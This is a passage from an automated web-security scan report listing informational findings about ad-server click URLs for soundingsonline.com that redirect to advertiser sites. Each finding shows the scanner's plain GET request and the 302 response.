20.436. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/598276348/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/598276348/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/598276348/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/598276348/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:15:30 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

20.437. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/601575059/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/601575059/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/601575059/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/601575059/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:04:31 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

20.438. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/613368033/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/613368033/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/613368033/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/613368033/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:41:41 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i=2039">here</a>
...[SNIP]...

20.439. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/616635952/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/616635952/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/616635952/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/616635952/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:02:01 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

20.440. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/625092856/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/625092856/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/625092856/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/625092856/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:49:57 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

20.441. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/626621413/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/626621413/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/626621413/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/626621413/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:59:06 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i=2039">here</a>
...[SNIP]...

20.442. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/627769005/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/627769005/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/627769005/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/627769005/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:43:52 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.443. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/648001834/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/648001834/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/648001834/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/648001834/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:45:12 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

20.444. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/649757406/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/649757406/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/649757406/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/649757406/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:41:08 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i=2039">here</a>
...[SNIP]...

20.445. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/659749874/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/659749874/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/659749874/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/659749874/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:50:22 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.446. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/66254069/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/66254069/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/66254069/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/66254069/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:40:07 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

20.447. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/662579504/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/662579504/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/662579504/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/662579504/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:50:09 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

20.448. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/662641130/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/662641130/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/662641130/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.flashedition.com/publication?i=59172

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/662641130/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:40:21 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.flashedition.com/publication?i=59172
Content-Length: 324
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.flashedition.com/publication?i=59172">here</a>
...[SNIP]...

20.449. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/673709863/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/673709863/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/673709863/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/673709863/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:48:24 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
